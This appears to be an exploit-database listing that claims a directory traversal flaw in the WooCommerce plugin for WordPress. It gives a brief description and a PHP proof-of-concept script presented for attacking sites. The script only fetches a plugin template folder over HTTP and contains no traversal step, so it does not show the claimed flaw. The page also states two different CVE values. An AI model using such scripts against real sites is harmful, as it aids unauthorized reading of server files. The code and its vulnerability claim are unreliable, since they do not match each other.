WordPress WooCommerce 2.0 / 3.0 Directory Traversal

2017.12.01
Credit: Fu2x200
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-22

# Exploit Title: WordPress woocommerce directory traversal # Date: 28-11-2017 # Software Link: https://wordpress.org/plugins/woocommerce/ # Exploit Author:fu2x2000 # Contact: fu2x2000@gmail.com # Website: # CVE:2017-17058 #Version:Tested on WordPress 4.8.3 woocommerce 2.0/3.0 # Category: webapps 1. Description Identifying woo commerce theme pluging properly sanitized against Directory Traversal,even the latest version of WordPress with woocommerce can be vulnerable. 2. Proof of Concept $woo = "www/wp-content/plugins/woocommerce/templates/emails/plain/"; ` function file_get_contents_utf8($fn) { $opts = array( 'http' => array( 'method'=>"GET", 'header'=>"Content-Type: text/html; charset=utf-8" ) ); $wp = stream_context_create($opts); $result = @file_get_contents($fn,false,$wp); return $result; } /* $head= header("Content-Type: text/html; charset=utf-8"); ; */ header("Content-Type: text/html; charset=utf-8"); $result = file_get_contents_utf8("http://".$woo); echo $result; Regards Fu2x200


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top